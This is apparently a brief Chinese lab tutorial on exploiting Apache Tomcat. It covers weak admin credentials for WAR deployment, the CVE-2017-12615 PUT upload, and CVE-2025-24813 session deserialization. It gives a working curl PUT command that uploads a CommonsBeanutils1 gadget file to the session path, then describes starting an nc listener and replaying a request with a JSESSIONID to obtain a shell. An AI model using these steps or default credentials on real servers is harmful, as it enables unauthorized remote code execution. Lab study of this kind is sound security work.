java组件漏洞原理——Tomcat

0 阅读1分钟

Tomcat

JavaEE 中间件,运行 Java web ,端口 8080

1. 后台弱口令爆破文件部署

tomcat/tomcat8

登录后台,后台部署war包,与weblogic 相同

2. tomcat put 任意文件上传

tomcat/CVE-2017-12615

3. tomcat session 反序列化

CVE-2025-24813 (记得替换修复后的靶场,不要用 vulhub 官方的)

  1. 生成 cb1 链的 文件

之后去重命名一下,例如改为xiaohecb1.txt

之后把他传到ubuntu中

  1. 攻击目标服务器
curl -X PUT -H "Content-Range: bytes 0-5000/6200" --data-binary @刚刚生成的cb1链文件的路径 http://目标ip:目标端口/abo/session

⚠️ deserialize 这个字符串可以随便改,改了记得记录下,后面需要对应起来
⚠️ @符号不能删,建议先cd到cb1链文件目录再 @文件名

  1. 攻击机开启监听 nc -lvnp 端口
  2. 抓取burp目标服务器任意页面的请求(例如抓首页的包)

删一删cookie,只留下jsessionid

  1. 发送请求,攻击机得到shell